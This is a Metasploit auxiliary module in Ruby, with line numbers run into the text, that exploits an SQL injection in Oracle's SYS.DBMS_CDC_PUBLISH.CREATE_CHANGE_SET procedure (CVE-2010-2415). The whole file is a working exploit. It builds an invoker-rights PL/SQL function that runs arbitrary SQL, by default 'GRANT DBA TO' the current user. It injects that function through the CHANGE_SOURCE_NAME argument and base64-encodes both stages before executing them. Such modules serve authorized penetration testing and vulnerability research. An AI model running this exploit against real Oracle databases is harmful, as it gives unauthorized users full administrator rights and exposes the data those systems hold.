Path: blob/master/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb
19592 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::ORACLE78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET',13'Description' => %q{14The module exploits an sql injection flaw in the CREATE_CHANGE_SET15procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege16on the vulnerable package can exploit this vulnerability. By default, users granted17EXECUTE_CATALOG_ROLE have the required privilege.18},19'Author' => [ 'MC' ],20'License' => MSF_LICENSE,21'References' => [22[ 'CVE', '2010-2415' ],23[ 'OSVDB', '70078'],24[ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html' ],25],26'DisclosureDate' => '2010-10-13',27'Notes' => {28'Stability' => [CRASH_SAFE],29'SideEffects' => [IOC_IN_LOGS],30'Reliability' => []31}32)33)3435register_options(36[37OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),38]39)40end4142def run43return if !check_dependencies4445name = Rex::Text.rand_text_alpha_upper(1..10)46var1 = Rex::Text.rand_text_alpha_upper(1..10)47var2 = Rex::Text.rand_text_alpha_upper(1..10)4849function = "50CREATE OR REPLACE FUNCTION #{name}51RETURN VARCHAR2 AUTHID CURRENT_USER52IS53PRAGMA AUTONOMOUS_TRANSACTION;54BEGIN55EXECUTE IMMEDIATE '#{datastore['SQL']}';56COMMIT;57RETURN NULL;58END;59"6061# PROCEDURE CREATE_CHANGE_SET62# Argument Name Type In/Out Default?63# ------------------------------ ----------------------- ------ --------64# CHANGE_SET_NAME VARCHAR2 IN65# DESCRIPTION VARCHAR2 IN DEFAULT66# CHANGE_SOURCE_NAME VARCHAR2 IN <-boom ;)67# STOP_ON_DDL CHAR IN DEFAULT68# BEGIN_DATE DATE IN DEFAULT69# END_DATE DATE IN DEFAULT7071package = "72BEGIN73SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET('#{name}','#{name}','''||'||user||'.#{name}||''');74END;75"7677uno = Rex::Text.encode_base64(function)78dos = Rex::Text.encode_base64(package)7980encoded_sql = %|81DECLARE82#{var1} VARCHAR2(32767);83#{var2} VARCHAR2(32767);84BEGIN85#{var1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));86EXECUTE IMMEDIATE #{var1};87#{var2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));88EXECUTE IMMEDIATE #{var2};89END;90|9192print_status('Attempting sql injection on SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET...')93prepare_exec(encoded_sql)94print_status('Done...')95end96end979899